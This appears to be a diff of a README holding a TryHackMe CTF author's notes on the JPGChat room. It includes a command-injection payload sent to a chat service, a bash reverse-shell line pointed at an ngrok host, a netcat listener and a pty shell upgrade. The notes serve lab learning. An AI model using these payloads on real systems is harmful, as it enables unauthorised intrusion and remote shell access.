AyhamAl-Ali/CTF-Dump/THM/JPGChat/README.md

 **JPGChat**

-This is not a full wireup for this room, this is just my notes about it because I had multiple problems when tried to get  using revshells etc.
+This is not a full writeup for this room, this is just my notes about it because I had multiple problems when tried to get the revshell

 After doing the NMAP on the machine and found `ssh` open and a custom port of `3000` open, I tried to netcat to port `3000`, I've written `[REPORT]` and added my payload `am'; /bin/bash; #` why `/bin/bash` not revshell? that what I was struggling with, I have no idea why but I was not able to do any kind of connection to my tunnel (ngrok)

-I've setup my ngrok using `ngrok tcp 5000` and open my nc like this `nc -lnvp 5000` and sent my revshell payload like this `am;bash -i >& /dev/tcp/5.tcp.eu.ngrok.io/14411 0>&1;` and nope.. nothing appeard, this was 1 failure out of 20+ failures using many kind of revshell payloads, then I found this [writeup](https://www.aldeid.com/wiki/TryHackMe-JPGChat) which gave me the idea of spawning a local bash using just `/bin/bash` instead of my revshell payload
+I've setup my ngrok using `ngrok tcp 5000` and open my netcat like this `nc -lnvp 5000` and sent my revshell payload like this `am;bash -i >& /dev/tcp/5.tcp.eu.ngrok.io/14411 0>&1;` and nope.. nothing appeard, this was 1 failure out of 20+ failures using many kind of revshell payloads, then I found this [writeup](https://www.aldeid.com/wiki/TryHackMe-JPGChat) which gave me the idea of spawning a local bash using just `/bin/bash` instead of my revshell payload

 Then i stabiliezed my bash a little using `python3 -c "import pty; pty.spawn('/bin/bash')"` then added my ssh keys to get a proper shell using ssh as follows: